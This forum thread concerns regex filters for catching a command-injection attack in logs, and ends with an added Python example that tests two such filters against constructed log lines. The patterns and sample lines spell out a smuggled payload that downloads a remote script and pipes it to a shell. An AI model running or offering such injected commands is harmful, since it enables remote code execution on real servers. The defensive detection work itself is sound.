Hello,
What is the proper expression? I tried
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\"
but still error logs payload missing: SA ...
Thanks.
It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives; therefore, it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) It protects against payload missing: SA. What kind of payload missing: nonce I don't know at the moment and want to know. The day before yesterday I caught 2 events.
Statistics: Posted by durip — Tue Dec 26, 2023 7:44 pm
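
The escaping layers and the strict-versus-prefix trade-off discussed in this thread, as an added example that is not code from either poster. It decodes the escaped expression from the first post into the regex the engine actually receives, then runs it and the shorter expression from the reply over three log lines. Assumptions: the config value uses JSON-style string escaping, Python's `re` stands in for the unnamed tool's regex engine, and the log lines are constructed.

```python
import json
import re

# Expression from the first post, exactly as it would sit inside a
# double-quoted config value (assumption: JSON-style string escaping).
POSTED = r'";bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n"'

# What the regex engine receives once the string layer is decoded:
# \" becomes ", \\. becomes \. (literal dot), \\| becomes \| (literal pipe).
STRICT_REGEX = json.loads(POSTED)

# Shorter expression quoted in the reply, copied as posted.
PREFIX_REGEX = r';bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]'

STRICT = re.compile(STRICT_REGEX)
PREFIX = re.compile(PREFIX_REGEX)

# Constructed log lines (documentation IP ranges), not taken from the thread.
SAMPLE_LINES = [
    'id=1 field=;bash -c "curl 192.0.2.10/t | sh";echo -n',
    'id=2 field=;bash -c "curl 198.51.100.7/x | bash";echo -n',
    'id=3 field=curl 192.0.2.10/status',
]


def classify(line):
    """Return (strict_hit, prefix_hit) for one log line."""
    return (bool(STRICT.search(line)), bool(PREFIX.search(line)))


if __name__ == "__main__":
    print("decoded strict regex:", STRICT_REGEX)
    for line in SAMPLE_LINES:
        print(classify(line), line)
```

The second line differs from the first only in path and shell, so the strict expression misses it while the prefix expression still matches; the third line lacks the `;bash -c "` prefix and matches neither.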